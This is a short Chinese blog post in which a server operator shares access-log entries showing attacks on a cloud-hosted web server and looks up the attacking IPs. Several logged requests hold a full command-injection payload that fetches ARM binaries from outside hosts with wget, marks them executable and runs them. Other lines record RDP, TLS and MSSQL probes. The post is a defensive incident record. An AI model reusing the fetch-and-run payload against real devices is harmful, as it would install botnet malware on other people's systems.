【网络安全】 关于http服务器遭受webshell攻击
【网络安全】 关于http服务器遭受webshell攻击
- 1、背景
- 2、ip地址查询
- 3、可疑请求ip
1、背景
在阿里云公网上部署web服务器,最近客户反映我的服务经常断掉,查看后台日志,发现境外的IP攻击。
比如:
209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
如下图:
2、ip地址查询
我使用的是马老师家的IP地址库查询:
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g
比如下面查询日志中可以的IP:
209.141.56.212
3、可疑请求ip
209.141.56.212
209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
141.101.196.233
这个攻击者有点意思(友善?),查到我的服务器在中国就没接着攻击了,详细如下:
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:17] "CONNECT 91.214.48.87:80 HTTP/1.1" 404 -[ ERROR ] 141.101.196.233 - - [17/Sep/2021 12:58:27] code 400, message Bad request syntax ('\x04\x01\x00P[Ö0W0\x00')[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:27] "P[Ö0W0" HTTPStatus.BAD_REQUEST -[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:29] "POST http://proxy.kagda.ru/myip2.php?Z74857023071Q1 HTTP/1.1" 404 -
47.100.27.27
89.248.165.93 - - [13/Sep/2021 16:29:22] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')89.248.165.93 - - [13/Sep/2021 16:29:22] "[35m[1m à [0m" HTTPStatus.BAD_REQUEST -
205.185.115.123
205.185.115.123 - - [13/Sep/2021 19:30:50] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
89.248.165.13
89.248.165.13 - - [13/Sep/2021 23:46:45] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')89.248.165.13 - - [13/Sep/2021 23:46:45] "[35m[1m à [0m" HTTPStatus.BAD_REQUEST -
205.185.115.123
205.185.115.123 - - [14/Sep/2021 04:52:39] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -205.185.115.123 - - [14/Sep/2021 10:27:01] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
74.120.14.44
74.120.14.44 - - [14/Sep/2021 10:39:06] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{ \x01\x00\x00w\x03\x030âFh®\xad\x18\xad\x8c=\x8d\x07Ï4úiQß\x90æ\x92\x80±àTêP*6ß\x10\x08\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')74.120.14.44 - - [14/Sep/2021 10:39:06] "[35m[1m { w0âFh®Œ=Ï4úiQßæ’€±àTêP*6ß À/À+ÀÀÀÀ ÀÀ[0m" HTTPStatus.BAD_REQUEST -74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -
185.219.52.154
185.219.52.154 - - [14/Sep/2021 22:34:50] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00É·\x00\x00')185.219.52.154 - - [14/Sep/2021 22:34:50] "[35m[1m 4 ( ÿ U MSSQLServer É· [0m" HTTPStatus.BAD_REQUEST -
78.128.112.18
78.128.112.18 - - [15/Sep/2021 00:58:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')78.128.112.18 - - [15/Sep/2021 00:58:36] "[35m[1m /*à Cookie: mstshash=Administr[0m" HTTPStatus.BAD_REQUEST -
47.103.21.238
47.103.21.238 - - [15/Sep/2021 08:48:35] code 400, message Bad request version ("_¸<³'àA\x04\x9b\x84%.W7\x00\x00\x16À\x14\x005À\x13\x00/À,À+À0\x00\x9dÀ/\x00\x9c\x00")47.103.21.238 - - [15/Sep/2021 08:48:35] "[35m[1m ˆ „aAB㲂 øN5[‡ç47þ_¸<³'àA›„%.W7 À 5À /À,À+À0 À/ œ [0m" HTTPStatus.BAD_REQUEST -
161.189.134.11
161.189.134.11 - - [15/Sep/2021 14:27:33] code 400, message Bad request syntax ('{ \x01\x00\x1615888888888À¨\x90Á\x13\x8a{')161.189.134.11 - - [15/Sep/2021 14:27:33] "[35m[1m{ 15888888888À¨ÁŠ{[0m" HTTPStatus.BAD_REQUEST -
逃离我推掉我的手
àì夳堔傛蜴生んèń
港控/mmm°
柔情只为你懂
╰+攻爆jí腚メ
还没有评论,来说两句吧...